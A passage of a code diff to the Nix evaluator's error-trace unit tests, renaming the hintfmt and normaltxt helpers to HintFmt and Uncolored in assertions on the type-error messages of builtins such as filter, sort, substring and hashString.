Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.filter")); ASSERT_TRACE2("filter 1 [ \"foo\" ]", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.filter")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.filter")); ASSERT_TRACE2("filter (_: 5) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "5" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the filtering function passed to builtins.filter")); + HintFmt("expected a Boolean but found %s: %s", "an integer", Uncolored(ANSI_CYAN "5" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the filtering function passed to builtins.filter")); } @@ -697,8 +698,8 @@ namespace nix { TEST_F(ErrorTraceTest, elem) { ASSERT_TRACE2("elem 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.elem")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.elem")); } @@ -706,18 +707,18 @@ namespace nix { TEST_F(ErrorTraceTest, concatLists) { ASSERT_TRACE2("concatLists 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.concatLists")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.concatLists")); ASSERT_TRACE2("concatLists [ 1 ]", TypeError, 
- hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating a value of the list passed to builtins.concatLists")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating a value of the list passed to builtins.concatLists")); ASSERT_TRACE2("concatLists [ [1] \"foo\" ]", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating a value of the list passed to builtins.concatLists")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating a value of the list passed to builtins.concatLists")); } @@ -725,13 +726,13 @@ namespace nix { TEST_F(ErrorTraceTest, length) { ASSERT_TRACE2("length 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.length")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.length")); ASSERT_TRACE2("length \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.length")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.length")); } @@ -739,22 +740,22 @@ namespace nix { TEST_F(ErrorTraceTest, foldlPrime) { ASSERT_TRACE2("foldl' 1 \"foo\" true", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.foldlStrict")); + 
HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.foldlStrict")); ASSERT_TRACE2("foldl' (_: 1) \"foo\" true", TypeError, - hintfmt("expected a list but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating the third argument passed to builtins.foldlStrict")); + HintFmt("expected a list but found %s: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating the third argument passed to builtins.foldlStrict")); ASSERT_TRACE1("foldl' (_: 1) \"foo\" [ true ]", TypeError, - hintfmt("attempt to call something which is not a function but %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL))); + HintFmt("attempt to call something which is not a function but %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL))); ASSERT_TRACE2("foldl' (a: b: a && b) \"foo\" [ true ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("in the left operand of the AND (&&) operator")); + HintFmt("expected a Boolean but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("in the left operand of the AND (&&) operator")); } @@ -762,18 +763,18 @@ namespace nix { TEST_F(ErrorTraceTest, any) { ASSERT_TRACE2("any 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.any")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.any")); ASSERT_TRACE2("any (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed 
to builtins.any")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.any")); ASSERT_TRACE2("any (_: 1) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the function passed to builtins.any")); + HintFmt("expected a Boolean but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the function passed to builtins.any")); } @@ -781,18 +782,18 @@ namespace nix { TEST_F(ErrorTraceTest, all) { ASSERT_TRACE2("all 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.all")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.all")); ASSERT_TRACE2("all (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.all")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.all")); ASSERT_TRACE2("all (_: 1) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the function passed to builtins.all")); + HintFmt("expected a Boolean but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the function passed to builtins.all")); } @@ -800,23 +801,23 @@ namespace nix { 
TEST_F(ErrorTraceTest, genList) { ASSERT_TRACE2("genList 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.genList")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.genList")); ASSERT_TRACE2("genList 1 2", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.genList", "an integer")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.genList", "an integer")); // XXX: defered // ASSERT_TRACE2("genList (x: x + \"foo\") 2 #TODO", // TypeError, - // hintfmt("cannot add %s to an integer", "a string"), - // hintfmt("while evaluating anonymous lambda")); + // HintFmt("cannot add %s to an integer", "a string"), + // HintFmt("while evaluating anonymous lambda")); ASSERT_TRACE1("genList false (-3)", EvalError, - hintfmt("cannot create list of size %d", -3)); + HintFmt("cannot create list of size %d", -3)); } @@ -824,31 +825,31 @@ namespace nix { TEST_F(ErrorTraceTest, sort) { ASSERT_TRACE2("sort 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.sort")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.sort")); ASSERT_TRACE2("sort 1 [ \"foo\" ]", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first 
argument passed to builtins.sort")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.sort")); ASSERT_TRACE1("sort (_: 1) [ \"foo\" \"bar\" ]", TypeError, - hintfmt("attempt to call something which is not a function but %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL))); + HintFmt("attempt to call something which is not a function but %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL))); ASSERT_TRACE2("sort (_: _: 1) [ \"foo\" \"bar\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the sorting function passed to builtins.sort")); + HintFmt("expected a Boolean but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the sorting function passed to builtins.sort")); // XXX: Trace too deep, need better asserts // ASSERT_TRACE1("sort (a: b: a <= b) [ \"foo\" {} ] # TODO", // TypeError, - // hintfmt("cannot compare %s with %s", "a string", "a set")); + // HintFmt("cannot compare %s with %s", "a string", "a set")); // ASSERT_TRACE1("sort (a: b: a <= b) [ {} {} ] # TODO", // TypeError, - // hintfmt("cannot compare %s with %s; values of that type are incomparable", "a set", "a set")); + // HintFmt("cannot compare %s with %s; values of that type are incomparable", "a set", "a set")); } @@ -856,18 +857,18 @@ namespace nix { TEST_F(ErrorTraceTest, partition) { ASSERT_TRACE2("partition 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.partition")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to 
builtins.partition")); ASSERT_TRACE2("partition (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.partition")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.partition")); ASSERT_TRACE2("partition (_: 1) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the partition function passed to builtins.partition")); + HintFmt("expected a Boolean but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the partition function passed to builtins.partition")); } @@ -875,18 +876,18 @@ namespace nix { TEST_F(ErrorTraceTest, groupBy) { ASSERT_TRACE2("groupBy 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.groupBy")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.groupBy")); ASSERT_TRACE2("groupBy (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.groupBy")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.groupBy")); ASSERT_TRACE2("groupBy (x: x) [ \"foo\" \"bar\" 1 ]", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - 
hintfmt("while evaluating the return value of the grouping function passed to builtins.groupBy")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the grouping function passed to builtins.groupBy")); } @@ -894,23 +895,23 @@ namespace nix { TEST_F(ErrorTraceTest, concatMap) { ASSERT_TRACE2("concatMap 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.concatMap")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.concatMap")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: 1) [ \"foo\" ] # TODO", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the function passed to builtins.concatMap")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the function passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: \"foo\") [ 1 2 ] # TODO", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the function passed to builtins.concatMap")); + HintFmt("expected a list but found %s: %s", "a string", 
Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the function passed to builtins.concatMap")); } @@ -918,13 +919,13 @@ namespace nix { TEST_F(ErrorTraceTest, add) { ASSERT_TRACE2("add \"foo\" 1", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument of the addition")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument of the addition")); ASSERT_TRACE2("add 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument of the addition")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument of the addition")); } @@ -932,13 +933,13 @@ namespace nix { TEST_F(ErrorTraceTest, sub) { ASSERT_TRACE2("sub \"foo\" 1", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument of the subtraction")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument of the subtraction")); ASSERT_TRACE2("sub 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument of the subtraction")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument of the subtraction")); } @@ -946,13 +947,13 @@ namespace nix { TEST_F(ErrorTraceTest, mul) { ASSERT_TRACE2("mul \"foo\" 1", TypeError, - 
hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument of the multiplication")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument of the multiplication")); ASSERT_TRACE2("mul 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument of the multiplication")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument of the multiplication")); } @@ -960,17 +961,17 @@ namespace nix { TEST_F(ErrorTraceTest, div) { ASSERT_TRACE2("div \"foo\" 1 # TODO: an integer was expected -> a number", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first operand of the division")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first operand of the division")); ASSERT_TRACE2("div 1 \"foo\"", TypeError, - hintfmt("expected a float but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second operand of the division")); + HintFmt("expected a float but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second operand of the division")); ASSERT_TRACE1("div \"foo\" 0", EvalError, - hintfmt("division by zero")); + HintFmt("division by zero")); } @@ -978,13 +979,13 @@ namespace nix { TEST_F(ErrorTraceTest, bitAnd) { ASSERT_TRACE2("bitAnd 1.1 2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "1.1" ANSI_NORMAL)), - 
hintfmt("while evaluating the first argument passed to builtins.bitAnd")); + HintFmt("expected an integer but found %s: %s", "a float", Uncolored(ANSI_CYAN "1.1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.bitAnd")); ASSERT_TRACE2("bitAnd 1 2.2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "2.2" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.bitAnd")); + HintFmt("expected an integer but found %s: %s", "a float", Uncolored(ANSI_CYAN "2.2" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.bitAnd")); } @@ -992,13 +993,13 @@ namespace nix { TEST_F(ErrorTraceTest, bitOr) { ASSERT_TRACE2("bitOr 1.1 2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "1.1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.bitOr")); + HintFmt("expected an integer but found %s: %s", "a float", Uncolored(ANSI_CYAN "1.1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.bitOr")); ASSERT_TRACE2("bitOr 1 2.2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "2.2" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.bitOr")); + HintFmt("expected an integer but found %s: %s", "a float", Uncolored(ANSI_CYAN "2.2" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.bitOr")); } @@ -1006,13 +1007,13 @@ namespace nix { TEST_F(ErrorTraceTest, bitXor) { ASSERT_TRACE2("bitXor 1.1 2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "1.1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.bitXor")); + HintFmt("expected an integer but found %s: %s", "a float", Uncolored(ANSI_CYAN "1.1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.bitXor")); 
ASSERT_TRACE2("bitXor 1 2.2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "2.2" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.bitXor")); + HintFmt("expected an integer but found %s: %s", "a float", Uncolored(ANSI_CYAN "2.2" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.bitXor")); } @@ -1020,16 +1021,16 @@ namespace nix { TEST_F(ErrorTraceTest, lessThan) { ASSERT_TRACE1("lessThan 1 \"foo\"", EvalError, - hintfmt("cannot compare %s with %s", "an integer", "a string")); + HintFmt("cannot compare %s with %s", "an integer", "a string")); ASSERT_TRACE1("lessThan {} {}", EvalError, - hintfmt("cannot compare %s with %s; values of that type are incomparable", "a set", "a set")); + HintFmt("cannot compare %s with %s; values of that type are incomparable", "a set", "a set")); ASSERT_TRACE2("lessThan [ 1 2 ] [ \"foo\" ]", EvalError, - hintfmt("cannot compare %s with %s", "an integer", "a string"), - hintfmt("while comparing two list elements")); + HintFmt("cannot compare %s with %s", "an integer", "a string"), + HintFmt("while comparing two list elements")); } @@ -1037,8 +1038,8 @@ namespace nix { TEST_F(ErrorTraceTest, toString) { ASSERT_TRACE2("toString { a = 1; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", normaltxt("{ a = " ANSI_CYAN "1" ANSI_NORMAL "; }")), - hintfmt("while evaluating the first argument passed to builtins.toString")); + HintFmt("cannot coerce %s to a string: %s", "a set", Uncolored("{ a = " ANSI_CYAN "1" ANSI_NORMAL "; }")), + HintFmt("while evaluating the first argument passed to builtins.toString")); } @@ -1046,22 +1047,22 @@ namespace nix { TEST_F(ErrorTraceTest, substring) { ASSERT_TRACE2("substring {} \"foo\" true", TypeError, - hintfmt("expected an integer but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the first argument (the start offset) passed to builtins.substring")); + 
HintFmt("expected an integer but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the first argument (the start offset) passed to builtins.substring")); ASSERT_TRACE2("substring 3 \"foo\" true", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument (the substring length) passed to builtins.substring")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument (the substring length) passed to builtins.substring")); ASSERT_TRACE2("substring 0 3 {}", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the third argument (the string) passed to builtins.substring")); + HintFmt("cannot coerce %s to a string: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the third argument (the string) passed to builtins.substring")); ASSERT_TRACE1("substring (-3) 3 \"sometext\"", EvalError, - hintfmt("negative start position in 'substring'")); + HintFmt("negative start position in 'substring'")); } @@ -1069,8 +1070,8 @@ namespace nix { TEST_F(ErrorTraceTest, stringLength) { ASSERT_TRACE2("stringLength {} # TODO: context is missing ???", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the argument passed to builtins.stringLength")); + HintFmt("cannot coerce %s to a string: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the argument passed to builtins.stringLength")); } @@ -1078,17 +1079,17 @@ namespace nix { TEST_F(ErrorTraceTest, hashString) { ASSERT_TRACE2("hashString 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.hashString")); + HintFmt("expected a string but 
found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.hashString")); ASSERT_TRACE1("hashString \"foo\" \"content\"", UsageError, - hintfmt("unknown hash algorithm '%s', expect 'md5', 'sha1', 'sha256', or 'sha512'", "foo")); + HintFmt("unknown hash algorithm '%s', expect 'md5', 'sha1', 'sha256', or 'sha512'", "foo")); ASSERT_TRACE2("hashString \"sha256\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the second argument passed to builtins.hashString")); + HintFmt("expected a string but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the second argument passed to builtins.hashString")); } @@ -1096,17 +1097,17 @@ namespace nix { TEST_F(ErrorTraceTest, match) { ASSERT_TRACE2("match 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.match")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.match")); ASSERT_TRACE2("match \"foo\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the second argument passed to builtins.match")); + HintFmt("expected a string but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the second argument passed to builtins.match")); ASSERT_TRACE1("match \"(.*\" \"\"", EvalError, - hintfmt("invalid regular expression '%s'", "(.*")); + HintFmt("invalid regular expression '%s'", "(.*")); } @@ -1114,17 +1115,17 @@ namespace nix { TEST_F(ErrorTraceTest, split) { ASSERT_TRACE2("split 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first 
argument passed to builtins.split")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.split")); ASSERT_TRACE2("split \"foo\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the second argument passed to builtins.split")); + HintFmt("expected a string but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the second argument passed to builtins.split")); ASSERT_TRACE1("split \"f(o*o\" \"1foo2\"", EvalError, - hintfmt("invalid regular expression '%s'", "f(o*o")); + HintFmt("invalid regular expression '%s'", "f(o*o")); } @@ -1132,18 +1133,18 @@ namespace nix { TEST_F(ErrorTraceTest, concatStringsSep) { ASSERT_TRACE2("concatStringsSep 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument (the separator string) passed to builtins.concatStringsSep")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument (the separator string) passed to builtins.concatStringsSep")); ASSERT_TRACE2("concatStringsSep \"foo\" {}", TypeError, - hintfmt("expected a list but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the second argument (the list of strings to concat) passed to builtins.concatStringsSep")); + HintFmt("expected a list but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the second argument (the list of strings to concat) passed to builtins.concatStringsSep")); ASSERT_TRACE2("concatStringsSep \"foo\" [ 1 2 {} ] # TODO: coerce to string is buggy", TypeError, - hintfmt("cannot coerce %s to a string: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating one element of the list of strings to 
concat passed to builtins.concatStringsSep")); + HintFmt("cannot coerce %s to a string: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating one element of the list of strings to concat passed to builtins.concatStringsSep")); } @@ -1151,8 +1152,8 @@ namespace nix { TEST_F(ErrorTraceTest, parseDrvName) { ASSERT_TRACE2("parseDrvName 1", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.parseDrvName")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.parseDrvName")); } @@ -1160,13 +1161,13 @@ namespace nix { TEST_F(ErrorTraceTest, compareVersions) { ASSERT_TRACE2("compareVersions 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" 